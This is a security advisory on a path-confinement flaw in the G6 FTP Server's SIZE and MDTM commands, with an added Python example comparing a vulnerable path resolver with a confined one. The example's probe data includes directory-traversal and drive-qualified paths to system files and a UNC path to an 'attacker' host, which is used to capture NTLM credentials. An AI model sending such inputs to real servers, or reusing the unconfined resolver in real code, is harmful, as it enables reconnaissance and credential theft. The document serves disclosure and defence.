COMMAND
G6 ftpd
SYSTEMS AFFECTED
G6 FTP Server v2.0 [Application has been renamed to BPFTP Server v2.10]
PROBLEM
The following is based on an @stake Security Advisory by Rob Beck.
Gene6's G6 FTP Server fails to restrict the 'SIZE' and 'MDTM' FTP
commands to the FTP root directory when the 'show relative paths'
option is not set. SIZE returns a file's size and MDTM its last
modification time, so a remote user can use them to confirm that
files and directories outside the FTP root exist and to map the
directory structure of the host system without ever retrieving a
file.
Many software vendors are adding features to their products to take
advantage of networked computers and shared resources, either on a
local area network (LAN) or across the Internet. Almost all Win32
applications now accept universal naming convention (UNC) paths
(\\server\share\file) to reach resources and files on other Windows
machines. Many of these vendors fail to take into account the
security threat that arises when such features are misused or their
safeguards are circumvented. An attacker who has found an otherwise
'trivial' weakness, such as a command that accepts an unrestricted
path, can raise its impact by supplying a UNC path in place of a
local one. To reach the 'share', the server opens an outbound SMB
connection to the attacker's host; when it tries to access the
remote resource, the hostile server can capture the credentials of
the account the service runs under (typically an NTLM
challenge/response), and those credentials can then be used for a
more serious attack on the host system. Confining path arguments
to the FTP root and refusing UNC arguments closes this in the
application; blocking outbound SMB (TCP 139/445) at the perimeter
limits what an unpatched server can leak.
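The following is an added example, not code from the @stake advisory or from Gene6. It shows a minimal SIZE/MDTM path resolver in the unconfined form the advisory describes beside a confined form that maps every argument onto the FTP root and refuses UNC and drive-qualified arguments. The FTP root C:\ftproot, the in-memory file table and the host name 'attacker' are constructed for the example; paths are handled with ntpath so it runs on any platform.

```python
"""Added example (not the advisory's or Gene6's code): an FTP server's
SIZE/MDTM path resolution without confinement, beside a confined
resolver that keeps every argument inside the FTP root and refuses UNC
and drive-qualified paths.  The disk is a constructed in-memory table.
"""
import ntpath

# Constructed stand-in for the server host's disk: lower-cased Windows
# path -> (size in bytes, modification time in MDTM YYYYMMDDHHMMSS form).
FAKE_FS = {
    "c:\\ftproot\\pub\\readme.txt": (1234, "20010614120000"),
    "c:\\windows\\system.ini": (219, "20000101000000"),
}
FTP_ROOT = "C:\\ftproot"  # assumed server configuration

# Every path the 'server' tried to open.  A UNC entry here would be an
# outbound SMB connection on a real Windows host.
OPEN_ATTEMPTS = []


class PathRejected(Exception):
    """Client-supplied path refused by the confined resolver."""


def is_unc(path):
    """True for the \\server\share and //server/share forms."""
    return path.startswith("\\\\") or path.startswith("//")


def _rel(virtual):
    """'/pub/x' (FTP view) -> 'pub\\x' (relative Windows path)."""
    return virtual.replace("/", "\\").lstrip("\\")


def resolve_vulnerable(root, cwd, arg):
    """'Show relative paths' off: absolute, drive-qualified and UNC
    arguments are used verbatim and '..' in relative ones is never
    checked, so SIZE/MDTM answer for anything the service account
    can reach."""
    drive, _ = ntpath.splitdrive(arg)
    if drive or arg.startswith(("\\", "/")):
        return ntpath.normpath(arg)
    return ntpath.normpath(ntpath.join(root, _rel(cwd), arg))


def resolve_confined(root, cwd, arg):
    """Map the argument onto the virtual root and verify that the
    normalised result still lies under it."""
    if is_unc(arg):
        raise PathRejected("UNC path refused: " + arg)
    if ntpath.splitdrive(arg)[0]:
        raise PathRejected("drive-qualified path refused: " + arg)
    # An FTP-absolute '/x' means '<root>\x', never 'C:\x'.
    rel = _rel(arg) if arg.startswith(("/", "\\")) else ntpath.join(_rel(cwd), arg)
    root_n = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_n, rel))
    lo_root, lo_cand = root_n.lower(), candidate.lower()
    # normpath has already collapsed '..'; anything not prefixed by
    # '<root>\' escaped.  Comparing with the trailing separator stops
    # C:\ftproot2 from passing for root C:\ftproot.
    if lo_cand != lo_root and not lo_cand.startswith(lo_root + "\\"):
        raise PathRejected("outside FTP root: " + arg)
    return candidate


def handle(cmd, cwd, arg, resolver, root=FTP_ROOT):
    """Answer SIZE or MDTM (RFC 3659 reply forms) against FAKE_FS."""
    try:
        path = resolver(root, cwd, arg)
    except PathRejected:
        return "550 Permission denied."
    OPEN_ATTEMPTS.append(path)  # a real server would open() here
    entry = FAKE_FS.get(path.lower())
    if entry is None:
        return "550 File not found."
    size, mtime = entry
    return "213 %s" % (size if cmd == "SIZE" else mtime)


if __name__ == "__main__":
    probes = [
        ("SIZE", "/pub", "readme.txt"),                   # legitimate
        ("SIZE", "/pub", "..\\..\\windows\\system.ini"),  # traversal
        ("MDTM", "/", "C:\\windows\\system.ini"),         # drive-qualified
        ("SIZE", "/", "\\\\attacker\\share\\x"),          # UNC -> outbound SMB
    ]
    for cmd, cwd, arg in probes:
        print("%-4s %-28s vulnerable: %-22s confined: %s" % (
            cmd, arg, handle(cmd, cwd, arg, resolve_vulnerable),
            handle(cmd, cwd, arg, resolve_confined)))
    print("open attempts:", OPEN_ATTEMPTS)
```

Run as a script, it prints each probe's reply under both resolvers: the unconfined resolver answers 213 for the traversal and drive-qualified probes and records an open attempt against \\attacker\share for the UNC probe, while the confined resolver returns 550 for all three and 213 only for the legitimate file. The check to port into a real server is the last one in resolve_confined: normalise first, then compare against the root with its trailing separator.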
SOLUTION
The vendor was very responsive and made a fixed version of the
software available within a week of being notified of the issues.
The fixed version is BPFTP Server v2.10 (note the change of
product name). It can be downloaded from:
http://www.bpftpserver.com/download.html